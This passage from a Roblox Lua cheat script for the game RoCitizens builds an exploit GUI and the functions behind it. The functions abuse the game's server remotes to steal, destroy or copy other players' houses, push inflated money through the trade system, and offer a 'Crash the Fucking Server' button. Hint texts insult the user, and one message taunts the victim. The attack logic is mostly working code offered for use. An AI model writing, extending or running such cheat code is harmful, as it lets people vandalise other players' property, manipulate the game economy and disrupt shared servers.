  1247. Func10.BackgroundColor3 = Color3.new(1, 1, 1)
  1248. Func10.BackgroundTransparency = 1
  1249. Func10.Position = UDim2.new(0, 0, 0, 270)
  1250. Func10.Size = UDim2.new(1, 0, 0, 25)
  1251.  
  1252. Clothing.Name = "Clothing"
  1253. Clothing.Parent = Func10
  1254. Clothing.BackgroundColor3 = Color3.new(1, 1, 1)
  1255. Clothing.BackgroundTransparency = 1
  1256. Clothing.Position = UDim2.new(0, 3, 0, 0)
  1257. Clothing.Size = UDim2.new(0, 200, 0, 25)
  1258. Clothing.Font = Enum.Font.Bodoni
  1259. Clothing.Text = "Add All Clothing"
  1260. Clothing.TextColor3 = Color3.new(0, 0, 0)
  1261. Clothing.TextSize = 17
  1262. Clothing.TextStrokeColor3 = Color3.new(1, 1, 1)
  1263. Clothing.TextStrokeTransparency = 0.69999998807907
  1264. Clothing.TextWrapped = true
  1265. Clothing.TextXAlignment = Enum.TextXAlignment.Left
  1266.  
  1267. Clothes.Name = "Clothes"
  1268. Clothes.Parent = Func10
  1269. Clothes.BackgroundColor3 = Color3.new(1, 1, 1)
  1270. Clothes.Position = UDim2.new(0, 135, 0, 0)
  1271. Clothes.Size = UDim2.new(0.519999981, 0, 0, 25)
  1272. Clothes.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
  1273. Clothes.Font = Enum.Font.ArialBold
  1274. Clothes.Text = "Add"
  1275. Clothes.TextColor3 = Color3.new(1, 1, 1)
  1276. Clothes.TextSize = 14
  1277. Clothes.TextStrokeTransparency = 0
  1278.  
  1279. Func11.Name = "Func11"
  1280. Func11.Parent = Functions
  1281. Func11.BackgroundColor3 = Color3.new(1, 1, 1)
  1282. Func11.BackgroundTransparency = 1
  1283. Func11.Position = UDim2.new(0, 0, 0, 300)
  1284. Func11.Size = UDim2.new(1, 0, 0, 25)
  1285.  
  1286. FurnitureLbl.Name = "FurnitureLbl"
  1287. FurnitureLbl.Parent = Func11
  1288. FurnitureLbl.BackgroundColor3 = Color3.new(1, 1, 1)
  1289. FurnitureLbl.BackgroundTransparency = 1
  1290. FurnitureLbl.Position = UDim2.new(0, 3, 0, 0)
  1291. FurnitureLbl.Size = UDim2.new(0, 200, 0, 25)
  1292. FurnitureLbl.Font = Enum.Font.Bodoni
  1293. FurnitureLbl.Text = "Add All Furniture"
  1294. FurnitureLbl.TextColor3 = Color3.new(0, 0, 0)
  1295. FurnitureLbl.TextSize = 17
  1296. FurnitureLbl.TextStrokeColor3 = Color3.new(1, 1, 1)
  1297. FurnitureLbl.TextStrokeTransparency = 0.69999998807907
  1298. FurnitureLbl.TextWrapped = true
  1299. FurnitureLbl.TextXAlignment = Enum.TextXAlignment.Left
  1300.  
  1301. Furniture.Name = "Furniture"
  1302. Furniture.Parent = Func11
  1303. Furniture.BackgroundColor3 = Color3.new(1, 1, 1)
  1304. Furniture.Position = UDim2.new(0, 135, 0, 0)
  1305. Furniture.Size = UDim2.new(0.519999981, 0, 0, 25)
  1306. Furniture.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
  1307. Furniture.Font = Enum.Font.ArialBold
  1308. Furniture.Text = "Add"
  1309. Furniture.TextColor3 = Color3.new(1, 1, 1)
  1310. Furniture.TextSize = 14
  1311. Furniture.TextStrokeTransparency = 0
  1312.  
  1313. Func12.Name = "Func12"
  1314. Func12.Parent = Functions
  1315. Func12.BackgroundColor3 = Color3.new(1, 1, 1)
  1316. Func12.BackgroundTransparency = 1
  1317. Func12.Position = UDim2.new(0, 0, 0, 330)
  1318. Func12.Size = UDim2.new(1, 0, 0, 25)
  1319.  
  1320. House.Name = "House"
  1321. House.Parent = Func12
  1322. House.BackgroundColor3 = Color3.new(1, 1, 1)
  1323. House.BackgroundTransparency = 1
  1324. House.Position = UDim2.new(0, 3, 0, 0)
  1325. House.Size = UDim2.new(0, 200, 0, 25)
  1326. House.Font = Enum.Font.Bodoni
  1327. House.Text = "Save House:"
  1328. House.TextColor3 = Color3.new(0, 0, 0)
  1329. House.TextSize = 17
  1330. House.TextStrokeColor3 = Color3.new(1, 1, 1)
  1331. House.TextStrokeTransparency = 0.69999998807907
  1332. House.TextWrapped = true
  1333. House.TextXAlignment = Enum.TextXAlignment.Left
  1334.  
  1335. HouseSave.Name = "HouseSave"
  1336. HouseSave.Parent = Func12
  1337. HouseSave.BackgroundColor3 = Color3.new(1, 1, 1)
  1338. HouseSave.Position = UDim2.new(0, 215, 0, 0)
  1339. HouseSave.Size = UDim2.new(0.25, 0, 0, 25)
  1340. HouseSave.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
  1341. HouseSave.Font = Enum.Font.ArialBold
  1342. HouseSave.Text = "Save"
  1343. HouseSave.TextColor3 = Color3.new(1, 1, 1)
  1344. HouseSave.TextSize = 14
  1345. HouseSave.TextStrokeTransparency = 0
  1346.  
  1347. HouseName.Name = "HouseName"
  1348. HouseName.Parent = Func12
  1349. HouseName.BackgroundColor3 = Color3.new(0.282353, 0.584314, 0.862745)
  1350. HouseName.BorderColor3 = Color3.new(0, 0, 0)
  1351. HouseName.Position = UDim2.new(0, 90, 0, 0)
  1352. HouseName.Size = UDim2.new(0, 120, 0, 25)
  1353. HouseName.Font = Enum.Font.Arial
  1354. HouseName.Text = "House 1"
  1355. HouseName.TextColor3 = Color3.new(1, 1, 1)
  1356. HouseName.TextSize = 17
  1357. HouseName.TextStrokeTransparency = 0
  1358.  
  1359. Func16.Name = "Func16"
  1360. Func16.Parent = Functions
  1361. Func16.BackgroundColor3 = Color3.new(1, 1, 1)
  1362. Func16.BackgroundTransparency = 1
  1363. Func16.Position = UDim2.new(0, 0, 0, 450)
  1364. Func16.Size = UDim2.new(1, 0, 0, 25)
  1365.  
  1366. Anti.Name = "Anti"
  1367. Anti.Parent = Func16
  1368. Anti.BackgroundColor3 = Color3.new(1, 1, 1)
  1369. Anti.BackgroundTransparency = 1
  1370. Anti.Position = UDim2.new(0, 3, 0, 0)
  1371. Anti.Size = UDim2.new(0, 200, 0, 25)
  1372. Anti.Font = Enum.Font.Bodoni
  1373. Anti.Text = "Anti - House Destroy"
  1374. Anti.TextColor3 = Color3.new(0, 0, 0)
  1375. Anti.TextSize = 17
  1376. Anti.TextStrokeColor3 = Color3.new(1, 1, 1)
  1377. Anti.TextStrokeTransparency = 0.69999998807907
  1378. Anti.TextWrapped = true
  1379. Anti.TextXAlignment = Enum.TextXAlignment.Left
  1380.  
  1381. AntiD.Name = "AntiD"
  1382. AntiD.Parent = Func16
  1383. AntiD.BackgroundColor3 = Color3.new(1, 1, 1)
  1384. AntiD.Position = UDim2.new(0, 150, 0, 0)
  1385. AntiD.Size = UDim2.new(0.469999999, 0, 0, 25)
  1386. AntiD.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
  1387. AntiD.Font = Enum.Font.ArialBold
  1388. AntiD.Text = "OFF"
  1389. AntiD.TextColor3 = Color3.new(1, 0, 0)
  1390. AntiD.TextSize = 14
  1391. AntiD.TextStrokeTransparency = 0.5
  1392.  
  1393. Func13.Name = "Func13"
  1394. Func13.Parent = Functions
  1395. Func13.BackgroundColor3 = Color3.new(1, 1, 1)
  1396. Func13.BackgroundTransparency = 1
  1397. Func13.Position = UDim2.new(0, 0, 0, 360)
  1398. Func13.Size = UDim2.new(1, 0, 0, 25)
  1399.  
  1400. House_2.Name = "House"
  1401. House_2.Parent = Func13
  1402. House_2.BackgroundColor3 = Color3.new(1, 1, 1)
  1403. House_2.BackgroundTransparency = 1
  1404. House_2.Position = UDim2.new(0, 3, 0, 0)
  1405. House_2.Size = UDim2.new(0, 200, 0, 25)
  1406. House_2.Font = Enum.Font.Bodoni
  1407. House_2.Text = "Load House:"
  1408. House_2.TextColor3 = Color3.new(0, 0, 0)
  1409. House_2.TextSize = 17
  1410. House_2.TextStrokeColor3 = Color3.new(1, 1, 1)
  1411. House_2.TextStrokeTransparency = 0.69999998807907
  1412. House_2.TextWrapped = true
  1413. House_2.TextXAlignment = Enum.TextXAlignment.Left
  1414.  
  1415. HouseLoad.Name = "HouseLoad"
  1416. HouseLoad.Parent = Func13
  1417. HouseLoad.BackgroundColor3 = Color3.new(1, 1, 1)
  1418. HouseLoad.Position = UDim2.new(0, 215, 0, 0)
  1419. HouseLoad.Size = UDim2.new(0.25, 0, 0, 25)
  1420. HouseLoad.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
  1421. HouseLoad.Font = Enum.Font.ArialBold
  1422. HouseLoad.Text = "Load"
  1423. HouseLoad.TextColor3 = Color3.new(1, 1, 1)
  1424. HouseLoad.TextSize = 14
  1425. HouseLoad.TextStrokeTransparency = 0
  1426.  
  1427. HouseName_2.Name = "HouseName"
  1428. HouseName_2.Parent = Func13
  1429. HouseName_2.BackgroundColor3 = Color3.new(0.282353, 0.584314, 0.862745)
  1430. HouseName_2.BorderColor3 = Color3.new(0, 0, 0)
  1431. HouseName_2.Position = UDim2.new(0, 90, 0, 0)
  1432. HouseName_2.Size = UDim2.new(0, 120, 0, 25)
  1433. HouseName_2.ClearTextOnFocus = false
  1434. HouseName_2.Font = Enum.Font.Arial
  1435. HouseName_2.Text = "House 1"
  1436. HouseName_2.TextColor3 = Color3.new(1, 1, 1)
  1437. HouseName_2.TextSize = 17
  1438. HouseName_2.TextStrokeTransparency = 0
  1439.  
  1440. Func14.Name = "Func14"
  1441. Func14.Parent = Functions
  1442. Func14.BackgroundColor3 = Color3.new(1, 1, 1)
  1443. Func14.BackgroundTransparency = 1
  1444. Func14.Position = UDim2.new(0, 0, 0, 390)
  1445. Func14.Size = UDim2.new(1, 0, 0, 25)
  1446.  
  1447. Signs.Name = "Signs"
  1448. Signs.Parent = Func14
  1449. Signs.BackgroundColor3 = Color3.new(1, 1, 1)
  1450. Signs.BackgroundTransparency = 1
  1451. Signs.Position = UDim2.new(0, 3, 0, 0)
  1452. Signs.Size = UDim2.new(0, 200, 0, 25)
  1453. Signs.Font = Enum.Font.Bodoni
  1454. Signs.Text = "Set Signs:"
  1455. Signs.TextColor3 = Color3.new(0, 0, 0)
  1456. Signs.TextSize = 17
  1457. Signs.TextStrokeColor3 = Color3.new(1, 1, 1)
  1458. Signs.TextStrokeTransparency = 0.69999998807907
  1459. Signs.TextWrapped = true
  1460. Signs.TextXAlignment = Enum.TextXAlignment.Left
  1461.  
  1462. SignsB.Name = "SignsB"
  1463. SignsB.Parent = Func14
  1464. SignsB.BackgroundColor3 = Color3.new(1, 1, 1)
  1465. SignsB.Position = UDim2.new(0, 215, 0, 0)
  1466. SignsB.Size = UDim2.new(0.25, 0, 0, 25)
  1467. SignsB.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
  1468. SignsB.Font = Enum.Font.ArialBold
  1469. SignsB.Text = "Set"
  1470. SignsB.TextColor3 = Color3.new(1, 1, 1)
  1471. SignsB.TextSize = 14
  1472. SignsB.TextStrokeTransparency = 0
  1473.  
  1474. SignsText.Name = "SignsText"
  1475. SignsText.Parent = Func14
  1476. SignsText.BackgroundColor3 = Color3.new(0.282353, 0.584314, 0.862745)
  1477. SignsText.BorderColor3 = Color3.new(0, 0, 0)
  1478. SignsText.Position = UDim2.new(0, 90, 0, 0)
  1479. SignsText.Size = UDim2.new(0, 120, 0, 25)
  1480. SignsText.ClearTextOnFocus = false
  1481. SignsText.Font = Enum.Font.Arial
  1482. SignsText.Text = "FalconPunch was here!"
  1483. SignsText.TextColor3 = Color3.new(1, 1, 1)
  1484. SignsText.TextScaled = true
  1485. SignsText.TextSize = 17
  1486. SignsText.TextStrokeTransparency = 0
  1487. SignsText.TextWrapped = true
  1488.  
  1489. Func15.Name = "Func15"
  1490. Func15.Parent = Functions
  1491. Func15.BackgroundColor3 = Color3.new(1, 1, 1)
  1492. Func15.BackgroundTransparency = 1
  1493. Func15.Position = UDim2.new(0, 0, 0, 420)
  1494. Func15.Size = UDim2.new(1, 0, 0, 25)
  1495.  
  1496. Crash.Name = "Crash"
  1497. Crash.Parent = Func15
  1498. Crash.BackgroundColor3 = Color3.new(1, 1, 1)
  1499. Crash.BackgroundTransparency = 1
  1500. Crash.Position = UDim2.new(0, 3, 0, 0)
  1501. Crash.Size = UDim2.new(0, 200, 0, 25)
  1502. Crash.Font = Enum.Font.Bodoni
  1503. Crash.Text = "Crash the Fucking Server:"
  1504. Crash.TextColor3 = Color3.new(0, 0, 0)
  1505. Crash.TextSize = 17
  1506. Crash.TextStrokeColor3 = Color3.new(1, 1, 1)
  1507. Crash.TextStrokeTransparency = 0.69999998807907
  1508. Crash.TextWrapped = true
  1509. Crash.TextXAlignment = Enum.TextXAlignment.Left
  1510.  
  1511. CrashB.Name = "CrashB"
  1512. CrashB.Parent = Func15
  1513. CrashB.BackgroundColor3 = Color3.new(1, 1, 1)
  1514. CrashB.Position = UDim2.new(0, 185, 0, 0)
  1515. CrashB.Size = UDim2.new(0.349999994, 0, 0, 25)
  1516. CrashB.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
  1517. CrashB.Font = Enum.Font.ArialBold
  1518. CrashB.Text = "Crash"
  1519. CrashB.TextColor3 = Color3.new(1, 1, 1)
  1520. CrashB.TextSize = 14
  1521. CrashB.TextStrokeTransparency = 0
  1522.  
  1523. Players.Name = "Players"
  1524. Players.Parent = Main
  1525. Players.Active = true
  1526. Players.BackgroundColor3 = Color3.new(0.333333, 0.666667, 1)
  1527. Players.BorderSizePixel = 0
  1528. Players.Position = UDim2.new(1, 25, 0, 50)
  1529. Players.Selectable = true
  1530. Players.Size = UDim2.new(0, 300, 0, 90)
  1531.  
  1532. Title_2.Name = "Title"
  1533. Title_2.Parent = Players
  1534. Title_2.BackgroundColor3 = Color3.new(1, 1, 1)
  1535. Title_2.BackgroundTransparency = 1
  1536. Title_2.Size = UDim2.new(1, 0, 0, 30)
  1537. Title_2.Font = Enum.Font.Bodoni
  1538. Title_2.Text = "Current Selected Player: None"
  1539. Title_2.TextColor3 = Color3.new(0, 0, 0)
  1540. Title_2.TextSize = 17
  1541. Title_2.TextStrokeColor3 = Color3.new(1, 1, 1)
  1542. Title_2.TextStrokeTransparency = 0.69999998807907
  1543. Title_2.TextXAlignment = Enum.TextXAlignment.Left
  1544.  
  1545. Players_2.Name = "Players"
  1546. Players_2.Parent = Players
  1547. Players_2.Active = true
  1548. Players_2.BackgroundColor3 = Color3.new(0.333333, 0.666667, 1)
  1549. Players_2.BackgroundTransparency = 1
  1550. Players_2.BorderSizePixel = 0
  1551. Players_2.Position = UDim2.new(0, 0, 0, 30)
  1552. Players_2.Selectable = true
  1553. Players_2.Size = UDim2.new(1, 0, 1, -60)
  1554.  
  1555. AllPlayers.Name = "AllPlayers"
  1556. AllPlayers.Parent = Players_2
  1557. AllPlayers.BackgroundColor3 = Color3.new(1, 1, 1)
  1558. AllPlayers.Size = UDim2.new(1, 0, 0, 25)
  1559. AllPlayers.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
  1560. AllPlayers.Font = Enum.Font.ArialBold
  1561. AllPlayers.Text = "Select all Players"
  1562. AllPlayers.TextColor3 = Color3.new(1, 1, 1)
  1563. AllPlayers.TextSize = 14
  1564. AllPlayers.TextStrokeTransparency = 0
  1565.  
  1566. PlayerBOX.Name = "PlayerBOX"
  1567. PlayerBOX.Parent = Players_2
  1568. PlayerBOX.BackgroundColor3 = Color3.new(0.282353, 0.584314, 0.862745)
  1569. PlayerBOX.BorderColor3 = Color3.new(0, 0, 0)
  1570. PlayerBOX.Position = UDim2.new(0, 5, 0, 30)
  1571. PlayerBOX.Size = UDim2.new(1, -10, 0, 25)
  1572. PlayerBOX.Font = Enum.Font.Arial
  1573. PlayerBOX.Text = "Enter Player Name"
  1574. PlayerBOX.TextColor3 = Color3.new(1, 1, 1)
  1575. PlayerBOX.TextSize = 17
  1576. PlayerBOX.TextStrokeTransparency = 0
  1577. end
  1578. local serv = setmetatable({}, {
  1579. __index = function(t, k)
  1580. return game:GetService(k)
  1581. end
  1582. })
  1583.  
  1584. local Plrs = serv.Players
  1585. local Run = serv.RunService
  1586. local RepStor = serv.ReplicatedStorage
  1587. local CoreGui = serv.CoreGui
  1588. local UserInput = serv.UserInputService
  1589. local Http = serv.HttpService
  1590.  
  1591. if game.PlaceId ~= 137877687 then
  1592. local Hint = Instance.new("Hint", CoreGui)
  1593. Hint.Text = "You fucking idiot, you need to be playing RoCitizens for this GUI"
  1594. wait(10)
  1595. Hint:Destroy()
  1596. script.Parent:Destroy()
  1597. end
  1598.  
  1599. local MyPlr = Plrs.LocalPlayer
  1600. local MyChar = MyPlr.Character
  1601. warn("Waiting for MyMoney")
  1602. local MyMoney do
  1603. repeat wait() until MyPlr:FindFirstChild("Money")
  1604. end
  1605. MyMoney = MyPlr.Money
  1606.  
  1607. warn("Waiting for ChangMoney")
  1608. local ChangeMoney do
  1609. repeat wait() until MyPlr:FindFirstChild("ChangeMoney")
  1610. end
  1611. ChangeMoney = MyPlr.ChangeMoney
  1612.  
  1613. local RoCitizensGUI = CoreGui.RoCitizens
  1614. local Msg = Instance.new("Hint", CoreGui)
  1615. Msg.Text = "This script has been discontinued."
  1616. wait(5)
  1617. Msg:Destroy()
  1618.  
  1619. local ComRelay = workspace.CommunicationRelays
  1620. local CTrades = workspace.CurrentTrades
  1621. local SelectedPlayer = Plrs:GetPlayers()[math.random(1, #Plrs:GetPlayers())]
  1622. RoCitizensGUI.Main.Players.Title.Text = "Current Selected Player: " .. SelectedPlayer.Name
  1623.  
  1624. local PermsExploit = false
  1625. local ExplosivesExploit = false
  1626. local LockpickExploit = false
  1627. local AntiHouseDestroy = false
  1628. local AntiHouseStealSign = nil
  1629.  
  1630. function format_int(Num)
  1631. local i, j, minus, int, fraction = tostring(Num):find("([-]?)(%d+)([.]?%d*)")
  1632.  
  1633. int = int:reverse():gsub("(%d%d%d)", "%1,")
  1634.  
  1635. return minus .. int:reverse():gsub("^,", "") .. fraction
  1636. end
  1637.  
  1638. function FindPlayer(Str)
  1639. local Plr = { }
  1640. for _, v in pairs(Plrs:GetPlayers()) do
  1641. if string.lower(string.sub(v.Name, 1, string.len(Str))) == string.lower(Str) then
  1642. table.insert(Plr, v)
  1643. end
  1644. end
  1645. if #Plr == 1 then
  1646. return Plr[1]
  1647. else
  1648. return nil
  1649. end
  1650. end
  1651.  
  1652. function FindPlayersWithAHouse()
  1653. local Players = { }
  1654. local Properties = { }
  1655. for _, v in next, workspace:GetChildren() do
  1656. if v:IsA("Model") and v.Name == "Property" then
  1657. table.insert(Properties, v:GetChildren())
  1658. end
  1659. end
  1660. for _, v in next, Properties do
  1661. local Find = v[1]:FindFirstChild("Owner")
  1662. if Find then
  1663. local FindPlr = Plrs:FindFirstChild(Find.Value)
  1664. if FindPlr and FindPlr:IsA("Player") then
  1665. table.insert(Players, FindPlr)
  1666. end
  1667. end
  1668. end
  1669. if #Players <= 0 then
  1670. Players = nil
  1671. end
  1672.  
  1673. return Players
  1674. end
  1675.  
  1676. function FindEmptyProperty(Prop)
  1677. local Properties = { }
  1678.  
  1679. for _, v in next, workspace:GetChildren() do
  1680. if v.Name == "Property" then
  1681. local House = v:GetChildren()
  1682. local GetPos = Vector3.new(Prop[1], Prop[2], Prop[3])
  1683. if (House[1].Base.Position - GetPos).magnitude < 5 then
  1684. local Find = House[1]:FindFirstChild("Owner")
  1685. if not Find then
  1686. table.insert(Properties, v)
  1687. else
  1688. workspace.CommunicationRelays.House.ResetProperty:FireServer(House[1])
  1689. table.insert(Properties, v)
  1690. end
  1691. end
  1692. end
  1693. end
  1694.  
  1695. return Properties
  1696. end
  1697.  
  1698. function FindHouse(Plr)
  1699. local Properties = { }
  1700. for _, v in next, workspace:GetChildren() do
  1701. if v:IsA("Model") and v.Name == "Property" then
  1702. table.insert(Properties, v:GetChildren())
  1703. end
  1704. end
  1705. for _, v in next, Properties do
  1706. local Find = v[1]:FindFirstChild("Owner")
  1707. if Find then
  1708. if Find.Value == Plr.Name then
  1709. return v[1]
  1710. end
  1711. end
  1712. end
  1713.  
  1714. return nil
  1715. end
  1716.  
  1717. function GeneratePermsTable(Plr)
  1718. local Tab = { }
  1719. for _, v in next, Plrs:GetPlayers() do
  1720. if v ~= Plr and v ~= MyPlr then
  1721. Tab[v.Name] = {["Ban"] = false, ["Paint"] = false, ["Door"] = false}
  1722. elseif v ~= Plr and v == MyPlr then
  1723. Tab[v.Name] = {["Ban"] = false, ["Paint"] = true, ["Door"] = true}
  1724. end
  1725. end
  1726.  
  1727. return Tab
  1728. end
  1729.  
  1730. function FlipLightSwitches(House)
  1731. local StaticAssets = House.StaticAssets
  1732. for _, v in next, StaticAssets:GetDescendants() do
  1733. if v.Name == "SwitchV2" then
  1734. ComRelay.Interaction.LightInteractV2:FireServer(v)
  1735. end
  1736. end
  1737. end
  1738.  
  1739. function OpenDoors(House)
  1740. local StaticAssets = House.StaticAssets
  1741. for _, v in next, StaticAssets:GetDescendants() do
  1742. if v.Name == "Door" or v.Name == "GlassDoor" then
  1743. ComRelay.Interaction.DoorInteract:FireServer(v)
  1744. end
  1745. end
  1746. end
  1747.  
  1748. function SendMessage(Plr, Msg) --ez
  1749. ComRelay.Interclient.SendMessage:InvokeServer(Msg, Plr.Name)
  1750. end
  1751.  
  1752. function BuildHouse(Plr)
  1753. local Building = true
  1754. local Hint = Instance.new("Hint", CoreGui)
  1755. Hint.Text = "Stealing house... This could take a while... and you might lag...)"
  1756. SendMessage(Plr, "I stole your house. To get it back: reset character, and spawn it in again. I'm Sowwy. :(")
  1757. local GetHouse = FindHouse(Plr)
  1758. if not GetHouse then
  1759. Hint.Text = "That player doesn't have a house!"
  1760. wait(7)
  1761. Hint:Destroy()
  1762. return
  1763. end
  1764.  
  1765. MyPlr.Character.HumanoidRootPart.CFrame = CFrame.new(GetHouse.PrimaryPart.Position + Vector3.new(0, 5, 0))
  1766. repeat wait() until GetHouse.StaticAssets:FindFirstChild("Furniture")
  1767. local GetFurniture = GetHouse.StaticAssets:FindFirstChild("Furniture")
  1768. local TempFurniture = Instance.new("Folder", MyPlr)
  1769. TempFurniture.Name = "TempFurniture"
  1770. local GetColors = GetHouse.AestheticChanger.UpdateRequested
  1771. local Table = { }
  1772. Table["HouseType"] = GetHouse.Name
  1773. Table["Furniture"] = { }
  1774. Table["Variables"] = { }
  1775. for i, v in next, GetFurniture:GetChildren() do
  1776. local Clo = v:clone()
  1777. Clo.Parent = TempFurniture
  1778. end
  1779. for i, v in next, GetColors:GetChildren() do
  1780. Table["Variables"][v.Name] = v.Value
  1781. end
  1782.  
  1783. ComRelay.House.ResetProperty:FireServer(GetHouse)
  1784. ComRelay.HomePurchase.House:InvokeServer(GetHouse.Parent, Table)
  1785. AntiHouseDestroy = false
  1786. RoCitizensGUI.Main.Functions.Func16.AntiD.Text = "OFF"
  1787. RoCitizensGUI.Main.Functions.Func16.AntiD.TextColor3 = Color3.new(1, 0, 0)
  1788.  
  1789. GetHouse = FindHouse(MyPlr)
  1790. for i, v in next, TempFurniture:GetChildren() do
  1791. Hint.Text = "Stealing house... placing furniture " .. i .. "/" .. #TempFurniture:GetChildren()
  1792. local Item = v:FindFirstChild("Item")
  1793. local Color = v:FindFirstChild("Color")
  1794. if Item and Color then
  1795. local Furn = workspace.CommunicationRelays.House.PlaceFurniture:InvokeServer(v.Name, v.PrimaryPart.CFrame, GetHouse, Item.Value, Color.Value)
  1796. if v.Name == "SS_Wooden Sign" then
  1797. workspace.CommunicationRelays.Interaction.EditSign:FireServer(Furn, v.Plaque.SurfaceGui.TextLabel.Text)
  1798. end
  1799. else
  1800. local Color1 = v:FindFirstChild("Color1")
  1801. local Color2 = v:FindFirstChild("Color2")
  1802. local Display = v:FindFirstChild("Display")
  1803. if Color1 and Color2 and Display then
  1804. workspace.CommunicationRelays.House.PlaceFurniture:InvokeServer(v.Name, v.PrimaryPart.CFrame, GetHouse, Item.Value, {["Display"] = Display.Value, ["Color1"] = Color1.Value, ["Color2"] = Color2.Value})
  1805. end
  1806. end
  1807. game:GetService("RunService").RenderStepped:wait()
  1808. end
  1809.  
  1810. TempFurniture:Destroy()
  1811.  
  1812. MyPlr.PlayerGui.Main.MyHouse.Value = GetHouse
  1813.  
  1814. FlipLightSwitches(GetHouse)
  1815. Building = false
  1816.  
  1817. Hint.Text = "House copied, and spawned. Place some furniture to save it to server."
  1818. wait(10)
  1819. Hint:Destroy()
  1820. end
  1821.  
  1822. function DestroyHouse(Plr, House)
  1823. if House == nil then
  1824. House = FindHouse(Plr)
  1825. end
  1826.  
  1827. if House ~= nil then
  1828. MyPlr.Character.HumanoidRootPart.CFrame = CFrame.new(House.Base.Position + Vector3.new(0, 5, 0))
  1829. repeat
  1830. MyPlr.Character.HumanoidRootPart.CFrame = CFrame.new(House.Base.Position + Vector3.new(0, 5, 0))
  1831. Run.RenderStepped:wait()
  1832. until House.StaticAssets:FindFirstChild("Furniture")
  1833. local Furn = House.StaticAssets.Furniture
  1834.  
  1835. for _, v in next, Furn:GetChildren() do
  1836. if v.Name == "SS_Wooden Sign" then
  1837. if v.Plaque.SurfaceGui.TextLabel.Text == "can't steal house" then
  1838. local Hint = Instance.new("Hint", CoreGui)
  1839. Hint.Text = "CANNOT DESTROY " .. Plr.Name .. "'s HOUSE THEIR ALSO USING THIS GUI <3"
  1840. wait(10)
  1841. Hint:Destroy()
  1842. return
  1843. end
  1844. end
  1845. end
  1846.  
  1847. ComRelay.House.ResetProperty:FireServer(House)
  1848.  
  1849. local Hint = Instance.new("Hint", CoreGui)
  1850. Hint.Text = "Destroyed: " .. SelectedPlayer.Name .. "'s house. You fucking dick."
  1851. wait(10)
  1852. Hint:Destroy()
  1853.  
  1854. if Plr == MyPlr then
  1855. MyPlr.PlayerGui.Main.MyHouse.Value = nil
  1856. end
  1857. end
  1858. end
  1859.  
  1860. function DonateExploit(Plr, Amount)
  1861. local Hint = Instance.new("Hint", CoreGui)
  1862. Hint.Text = "Sent " .. Plr.Name .. " a trade request. Awaiting response..."
  1863. if Plr.Money.Value == Amount or Plr.Money.Value > Amount then
  1864. Hint.Text = "Unable to trade, " .. Plr.Name .. " already has that amount of money!"
  1865. wait(7)
  1866. Hint:Destroy()
  1867. else
  1868. local Response, TradeId = ComRelay.Interclient.RequestTrade:InvokeServer(Plr.Name)
  1869. if Response and Response == "Accept" then
  1870. Hint.Text = "Trade accepted, and hacked donation amount awaiting " .. Plr.Name .. "'s response."
  1871. local Math = (Amount - Plr.Money.Value)
  1872. ComRelay.Interclient.TradeStart:InvokeServer(Plr.Name, TradeId)
  1873. ComRelay.Interclient.TradeUpdate:InvokeServer(TradeId, Math, "Money")
  1874. repeat wait() until CTrades:FindFirstChild(TradeId)
  1875. repeat
  1876. ComRelay.Interclient.TradeAccept:FireServer(TradeId)
  1877. wait(1)
  1878. until not CTrades:FindFirstChild(TradeId)
  1879. Hint.Text = "Sent " .. Plr.Name .. " $" .. format_int(Math)
  1880. wait(5)
  1881. Hint:Destroy()
  1882. elseif Response == "Busy" then
  1883. Hint.Text = Plr.Name .. " is busy with another trade."
  1884. wait(6)
  1885. Hint:Destroy()
  1886. else
  1887. Hint.Text = Plr.Name .. " declined trade. Money not sent."
  1888. wait(5)
  1889. Hint:Destroy()
  1890. end
  1891. end
  1892. end
  1893.  
  1894. function StealHouse()
  1895. local IHaveAHouse = FindHouse(MyPlr)
  1896. if IHaveAHouse then
  1897. DestroyHouse(MyPlr, IHaveAHouse)
  1898. end
  1899. BuildHouse(SelectedPlayer)
  1900. end
  1901.  
  1902. function EquipItem(Item)
  1903. ComRelay.Character.ItemEquip:FireServer("JobAssets", Item, Item)
  1904. end
  1905.  
  1906. function SaveHouse(HouseName)
  1907. local GetHouse = FindHouse(SelectedPlayer)
  1908. if not GetHouse then
  1909. return
  1910. end
  1911.  
  1912. MyChar.HumanoidRootPart.CFrame = CFrame.new(GetHouse.PrimaryPart.Position + Vector3.new(0, 5, 0))
  1913. repeat
  1914. MyChar.HumanoidRootPart.CFrame = CFrame.new(GetHouse.PrimaryPart.Position + Vector3.new(0, 5, 0))
  1915. wait()
  1916. until GetHouse.StaticAssets:FindFirstChild("Furniture")
  1917. local Furn = GetHouse.StaticAssets.Furniture
  1918. local Colors = GetHouse.AestheticChanger.UpdateRequested
  1919.  
  1920. local SaveData = { }
  1921. SaveData["HouseType"] = GetHouse.Name
  1922. SaveData["Furniture"] = { } -- Going to be nil.
  1923. SaveData["Variables"] = { }
  1924. SaveData["FurnData"] = { }
  1925. SaveData["Prop"] = {GetHouse.Base.Position.X, GetHouse.Base.Position.Y, GetHouse.Base.Position.Z}
  1926.  
  1927. for i, v in next, Furn:GetChildren() do
  1928. SaveData["FurnData"][v.Name .. i] = { }
  1929. local Item, Color = v:FindFirstChild("Item"), v:FindFirstChild("Color")
  1930. if Item and Color then
  1931. SaveData["FurnData"][v.Name .. i]["Name"] = v.Name
  1932. SaveData["FurnData"][v.Name .. i]["Item"] = Item.Value
  1933. SaveData["FurnData"][v.Name .. i]["Color"] = Color.Value
  1934. SaveData["FurnData"][v.Name .. i]["CFrame"] = {v.PrimaryPart.CFrame:components()}
  1935. if v.Name == "SS_Wooden Sign" then
  1936. SaveData["FurnData"][v.Name .. i]["Text"] = v.Plaque.SurfaceGui.TextLabel.Text
  1937. end
  1938. else
  1939. local Color1 = v:FindFirstChild("Color1")
  1940. local Color2 = v:FindFirstChild("Color2")
  1941. local Display = v:FindFirstChild("Display")
  1942. local Item = v:FindFirstChild("Item")
  1943. if Color1 and Color2 and Display and Item then
  1944. SaveData["FurnData"][v.Name .. i]["Item"] = Item.Value
  1945. SaveData["FurnData"][v.Name .. i]["Color1"] = Color1.Value
  1946. SaveData["FurnData"][v.Name .. i]["Color2"] = Color2.Value
  1947. SaveData["FurnData"][v.Name .. i]["Display"] = Display.Value
